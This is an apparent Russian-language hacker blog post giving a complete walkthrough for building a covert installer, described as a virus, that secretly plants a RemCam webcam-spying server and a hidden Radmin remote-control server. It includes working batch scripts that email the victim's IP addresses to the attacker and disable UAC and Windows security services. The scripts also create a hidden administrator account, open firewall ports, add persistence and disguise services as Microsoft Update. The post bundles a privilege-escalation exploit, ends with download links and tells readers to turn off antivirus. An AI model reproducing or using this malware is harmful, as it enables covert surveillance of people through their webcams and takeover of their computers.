Программа генерит готовый к скрытой установке сервер RemCam,который установится в систему и будет стартовать при каждом входе в систему.
Умеет генерить вирусы следующих конфигураций:
1. Просто сервер RemCam(программа для наблюдения через вебкамеру)
2. Сервер RemCam + Отправка ip для конекта на почтовый ящик
3. Сервер RemCam в привязке с сервером Radmin(2* версии)
4. Сервер RemCam в привязке с сервером Radmin + отправка ip на почту.
С генерированный файл можно называть как угодно,но запуск должен происходить от имени Администратора,иначе будет выдавать ошибку.
Палиться многими антивирусами,в прочем как и сам RemCam, впрочем для использования на Windows 7 не годиться так как палиться и сервер RemCam и сервер Radmin одним защитником Windows,а вот на XP вполне даже актуален,но опять же палят многие антивирусы вроде AVG,касперского,Norton.
Эта тема по сути сборка Iindigo http://www.xaker.name/forvb/showthread.php?t=19713 я в свою очередь только добавил RemCam2 (программа для передачи изображения с Веб Камеры и звука по сети) и внес некоторые изменения с отсылкой ip на почту...
И так,для сборки нам понадобятся:
msi пакет сервера Radmin 3.4 (не требует активации, скрывает иконку в трее, не пишется в пуск и установленные программы)
архив для отправки на email
сплойт Windows Task Scheduler Privilege Escalation
пакет утилит Radmin Deployment tool
программа Bat to Exe Converter
архиватор WinRar
сервер RemCam2
Далее устанавливаем Radmin Deployment tool, после установки запускаем Radmin MSI Configurator, указываем ему на скачанный msi пакет сервера Radmin 3.4, задаём настройки, добавляем пользователя и сохраняем. Я задал имя пользователя admin, пароль 123456 и сохранил пакет под именем msupdate.msi
Cсылка на видео по настройке (от Iindigo) http://www.youtube.com/watch?v=hQm5S75GeYM
Откладываем этот пакет в сторонку,открываем папку ip и начинаем настройку почтового клиента:
ip.bat
Цитата:@echo off
ipconfig /all > localip.txt
realip.exe > realip.txt
ping -n 2 127.0.0.1 > nul
blat.exe -install -server smtp.yandex.ru -port 25 -f логин@yandex.ru -u логин -pw пароль
blat.exe -to логин@yandex.ru -subject "Local IP" -attachi "localip.txt" -body "Locals IP"
blat.exe -to логин@yandex.ru -subject "Real IP" -attachi "realip.txt" -body "Real IP"
del /f /q localip.txt
del /f /q realip.txt
Настраиваем под себя,если будут проблемы с отправкой можно поменять порт 25 на 587(у меня работает на 587)
После того как вы изменили указанные данные на свои, сохраняем файл, закрываем.
Хочу обратить внимание - если вы не знаете какой адрес и порт вашего smtp сервера, зайдите на сайт и поищите в разделе помощи и часто задаваемых вопросов. Наверняка там найдётся эта информация. Если и здесь вас постигла неудача, зарегистрируйте ящик на yandex.ru и заполните поля по аналогии с вышеуказанным примером.
Далее, запускаем программу Bat to Exe Converter, выбираем файл ip.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory. Далее, переходим на вкладку Include, жмем Add и добавляем файлы blat.exe, blat.dll, blat.lib, realip.exe, которые есть у вас в папке ip. Затем жмём Compile и получаем файл ip.exe
Cсылка на видео по настройке ip:http://www.youtube.com/watch?v=klAIxkpVB1U
Откладываем готовый ip.exe к msupdate.msi.Теперь посмотрим на наш рабочий inst.cmd (есть готовый в скаченном вами архиве):
Цитата:@echo off
if exist c:\users\nul (goto win7) else goto winxp
:win7
ping -n 5 127.0.0.1
start %temp%\poc.exe
ping -n 5 127.0.0.1
goto install
:winxp
net stop Alerter
sc config Alerter start= disabled
net stop wscsvc
sc config wscsvc start= disabled
net stop SharedAccess
sc config SharedAccess start= disabled
sc config TlntSvr start= auto
net start TlntSvr
:install
copy /y "%temp%\ip.exe" "%SYSTEMROOT%/ip.exe"
copy /y "%temp%\cam_server.exe" "%SystemRoot%\cam_server.exe"
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v HelpAssistant /t REG_DWORD /d 0 /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "%SystemRoot%\cam_server.exe pass=Пароль port=57011" /f
attrib +s +h +r "%SYSTEMROOT%/ip.exe"
attrib +s +h +r "%SYSTEMROOT%/cam_server.exe"
netsh advfirewall firewall add rule name="RealIP" dir=in program="%SYSTEMROOT%\realip.exe" security=notrequired action=allow
netsh advfirewall firewall add rule name="Microsoft Outlook Express" dir=in program="%SYSTEMROOT%\blat.exe" security=notrequired action=allow
netsh firewall add allowedprogram "%SYSTEMROOT%\cam_server.exe" "cam_server" ENABLE
netsh firewall add portopening tcp 57011 all
net user HelpAssistant admin /add
net localgroup Ђ¤¬Ё*Ёбва*в®ал HelpAssistant /add
net user HelpAssistant /active:yes /comment:""зҐв**п §*ЇЁбм ¤«п ЇаҐ¤®бв*ў«Ґ*Ёп Ї®¬®йЁ" /passwordchg:yes
net user HelpAssistant admin
%temp%\msupdate.msi /qn /norestart
start %temp%\ip.exe
ping -n 5 127.0.0.1
attrib +S +H %windir%\system32\rserver30
schtasks /create /tn "security" /sc minute /mo 40 /ru "NT AUTHORITY\SYSTEM" /tr "%SYSTEMROOT%/ip.exe /f
cd %SystemRoot%\
start cam_server.exe pass=Пароль port=57011
net stop rserver3
reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "DisplayName" /d "Microsoft Update Provide" /f
reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "Description" /d "Update your Windows operation system and check corruption files" /f
net start rserver3
Интервал отправки ip можно подправить здесь:
schtasks /create /tn "security" /sc minute /mo 40 /ru "NT AUTHORITY\SYSTEM" /tr "%SYSTEMROOT%/ip.exe /f
Пароль к RemCam2 здесь:
1.reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "%SystemRoot%\cam_server.exe pass=Пароль port=57011" /f
2.start cam_server.exe pass=Пароль port=57011
Сохрянем файл как inst.cmd. Открываем программу Bat to Exe Converter, выбираем файл inst.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory и жмём Compile. Получаем inst.exe.
Кладём этот файл в кучу к msupdate.msi, ip.exe,cam_server.exe и туда же добавляем наш сплойт - poc.exe.
В итоге, у нас получилось 5 файлов
1)msupdate.msi - специальный пакет radmin server 3.4
2)ip.exe - программа которая возьмёт ip компьютера и отправит нам их на мыло
3)inst.exe - основной инсталлятор
4)poc.exe - сплойт Windows Task Scheduler Privilege Escalation
5)cam_server.exe-сервер RemCam2
Все 5 файлов объединяем в один самораспаковывающийся архив. Ставим архиватор WinRar. Затем, выделяем файлы и создаем архив. Даём архиву название, к примеру msupdate. В настройках архива ставим галочки напротив "Создать "SFX-архив" и "Протестировать файлы после упаковки". Уровень сжатия ставим максимальный. Далее переходим на вкладку "Дополнительно" и открываем "Параметры SFX".
Вкладка "Общие":
Путь для распаковки - вводим %temp%
Выполнить после распаковки - вводим %temp%\inst.exe
Вкладка "Режимы":
Режим вывода информации - ставим в "Скрыть всё"
Вкладка "Обновление":
Режим перезаписи - ставим в "Перезаписывать все файлы без запроса"
Жмём "Ок" и ещё раз "Ок" для создания архива.
Инсталлятор готов.
Тестил несколько раз все работает,кому что не понятно обращайтесь.
// копирование на другие ресурсы разрешено только с копирайтом и ссылкой на этот топик
Сборка предоставляется исключительно для ознакомления.
Использование данной сборки влечет за собой ответственность согласно действующему законодательству.
(с) kirill
Перед скачиванием отключаем антивирус!!!
([-])
http://ge.tt/9StG5NA
http://www.multiupload.com/U5G0WDBFOP
http://www.mediafire.com/?ui7tm4uc20f8cjg
0 коммент.:
Отправка комментария